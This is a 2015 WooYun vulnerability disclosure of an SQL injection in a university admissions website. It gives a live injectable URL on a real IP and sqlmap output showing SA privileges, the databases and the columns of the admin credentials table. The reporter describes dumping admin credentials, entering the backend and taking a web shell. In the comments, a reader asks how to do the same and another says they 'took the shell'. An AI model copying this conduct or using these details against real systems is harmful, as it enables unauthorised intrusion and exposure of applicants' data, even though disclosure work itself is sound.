当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109785

漏洞标题:西南民族大学招生信息网SQL一枚(已经getshell)

相关厂商:西南民族大学

漏洞作者: 泪雨无魂

提交时间:2015-04-29 20:26

修复时间:2015-05-04 20:28

公开时间:2015-05-04 20:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

西南民族大学招生信息网 网站存在高危SQL注入漏洞,经检测是SA权限,通过SQL注入漏洞,能够爆出多个数据库,管理员账号和密码也可以爆出,已经通过管理员账号和密码进入后台,并且getshell。。。。。。。。。
泄露了该大学招生信息网的大量重要信息。。。。。。。。。。。。。

详细说明:

西南民族大学招生信息网 网站存在高危SQL注入漏洞,经检测是SA权限,通过SQL注入漏洞,能够爆出多个数据库,管理员账号和密码也可以爆出,已经通过管理员账号和密码进入后台,并且getshell。。。。。。。。。
泄露了该大学招生信息网的大量重要信息。。。。。。。。。。。。。
大学的网站我也是点到为止。。。。。。。。。你懂的啦啦啦啦。。。。
注入点之一:http://222.210.17.165:80/selects.asp?Key=88888
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
[*] zsweb
current user: 'sa'
current database: 'zsweb'
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| AddTime | smalldatetime |
| ID | int |
| LastLoginIP | varchar |
| LastLoginTime | smalldatetime |
| UserLoginName | varchar |
| UserLoginPWD | varchar |
| UserRealName | varchar |
+---------------+---------------+
Database: zsweb
Table: KS_AdminX
[2 entries]
管理账号密码就不贴出来了
看图吧 。。。。。。。

1.png

10.jpg

111.png

112.png

3.png

21.png

11.jpg

2.png

3.png

12.png


漏洞证明:

注入点之一:http://222.210.17.165:80/selects.asp?Key=88888
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
[*] zsweb
current user: 'sa'
current database: 'zsweb'
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| AddTime | smalldatetime |
| ID | int |
| LastLoginIP | varchar |
| LastLoginTime | smalldatetime |
| UserLoginName | varchar |
| UserLoginPWD | varchar |
| UserRealName | varchar |
+---------------+---------------+
Database: zsweb
Table: KS_AdminX
[2 entries]

21.png


2.png


我是白帽子,不搞破坏哈哈哈哈哈哈!!!!!!
就这样吧,之前提交过大学网站的漏洞,不过被忽略了 这个是招生网 应该不会吧 你懂的 啊哈哈哈哈哈

修复方案:

你懂的

版权声明:转载请注明来源 泪雨无魂@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-04 20:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-08 18:59 | l0wK3y ( 路人 | Rank:17 漏洞数:8 | 读囚徒健身,当技术大拿)

    @泪雨无魂 怎么getshell 的呢?

  2. 2015-05-08 21:35 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:32 )

    @l0wK3y 额 怎么了 你也要搞??

  3. 2015-05-08 21:52 | l0wK3y ( 路人 | Rank:17 漏洞数:8 | 读囚徒健身,当技术大拿)

    @泪雨无魂 试了半天,结果失败了.....3087136937加我一下,细说

  4. 2015-05-08 22:16 | wsg00d ( 实习白帽子 | Rank:93 漏洞数:13 | 做一个安静、低调的学习狗)

    shell拿走了